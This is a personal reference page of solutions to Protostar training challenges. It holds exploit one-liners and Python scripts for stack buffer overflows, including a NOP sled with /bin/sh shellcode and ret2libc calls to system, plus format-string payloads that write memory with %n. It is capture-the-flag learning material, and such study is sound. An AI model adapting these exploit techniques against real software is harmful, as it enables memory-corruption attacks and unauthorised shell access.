NOTE: For some reason Exploit-Exercises.com is no longer available, so this page won't be updated.
Well, i started watching Liveoverflow and he explains the theory behind these challenges very good.
Most of the levels here i didn't solve myself, as i was still learning how to debug programs. I followed his video's, watched them over and over again, until i understood the level.
Afterwards i try to solve them myself, and post the results here.
This page is mostly for my reference, as there are some good techniques for further challenges.
python -c 'print "A"*64+"B"' | /opt/protostar/bin/stack0
./stack1 $(python -c 'print "A"*(16*4) + "\x64\x63\x62\x61"')
export GREENIE=$(python -c 'print "A"*(16*4) + "\x0a\x0d\x0a\x0d\x0a"')
python -c "print 'A'*(4*16)+'\x24\x84\x04\x08'" | ./stack3
python -c "print 'A'*(18*4)+'SSSS'+'\xf4\x83\x04\x08'" | ./stack4
(python exploit.py ; cat) | /opt/protostar/bin/stack5
#exploit.py import struct padding="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS" eip=struct.pack("I", 0xbffff7bc+30) #0xbffff7c0+30) nopslide="\x90"*100 payload="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" print padding+eip+nopslide+payload
(python exploit.py ; cat) | /opt/protostar/bin/stack6
#exploit.py import struct padding = "0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS" # Where we control the stack system = struct.pack("I", 0xb7ecffb0) # address of libc System we found by entering p system in gdb ret = "AAAA" # return after system, not important bin_sh = struct.pack("I", 0xb7fb63bf) # real address of /bin/sh into libc (libc address + offset we found) print padding+system+ret+bin_sh
(python /tmp/exploit.py; cat) | ./stack7
#exploit.py import struct padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT" # Junk return_0 = struct.pack('I', 0x08048544) # address of ret in getpath() return_1 = struct.pack('I', 0xb7ecffb0) # address of system (p system) return_2 = "JJJJ" # junk shell = struct.pack('I', 0xb7fb63bf) # "/bin/sh" libc=0xb7e97000 + offset=0x11f3bf print padding+return_0+return_1+return_2+shell
./format0 `python -c 'print "%64d\xef\xbe\xad\xde"'`
"`python -c "print 'AAAA'+'\x38\x96\x04\x08'+'BBBB'+'%x '*127+'%x '"`"
python -c "print '\xe4\x96\x04\x08'+'%44x'+'%x'*2+'%n'" | ./format2
python -c "print '\xf4\x96\x04\x08'+'%4x'+'%x'*10+'%n' + 'AAA\xf5\x96\x04\x08'+'%x.'*6+'%468x'+'%n' + 'AAA\xf7\x96\x04\x08'+'%x.'*6+'%111x'+'%n'" | ./format3